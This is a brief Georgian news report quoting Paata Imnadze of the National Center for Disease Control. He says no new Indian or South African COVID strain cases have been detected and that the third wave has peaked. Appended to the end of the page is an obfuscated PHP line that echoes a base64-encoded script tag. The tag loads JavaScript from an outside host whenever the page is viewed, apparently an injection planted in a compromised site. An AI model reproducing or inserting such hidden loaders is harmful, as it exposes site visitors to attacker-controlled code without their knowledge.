celsiusi
ავერსი შნაიდერი
დაავადებათა კონტროლის ეროვნული ცენტრის დირექტორის მოადგილე პაატა იმნაძის განცხადებით, ე.წ ინდური და სამხრეთ აფრიკული შტამების ახალი შემთხვევები ჯერჯერობით არ გამოვლენილა. ამის შესახებ პაატა იმნაძემ საინფორმაციო სააგენტო BUSINESS TIME- ს განუცხადა. 
 
“ე.წ ინდური და სამხრეთ აფრიკული შტამების ახალი შემთხვევები ჯერ არ გამოვლენილა . კვლევაშია კიდევ რამდენიმე ნიმუში. ისინი, ვისაც ეს ახალი შტამები დაუდასტურდა მკურნალობის კურსს სახლიდან გადიოდნენ.”- განაცხადა პაატა იმნაძემ. 
 
პაატა იმნაძემ BUSINESS TIME-თან  საუბრისას ასევე განაცხადა, რომ ქვეყანაში მესამე ტალღის პიკი დასრულებულია. 
 
ცნობისთვის, ქვეყანაში ე.წ ინდური შტამის 5 და ე.წ სამხრეთ აფრიკული შტამის 1 შემთხვევაა გამოვლენილი. 
 
 
 
 
 
 
1757
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");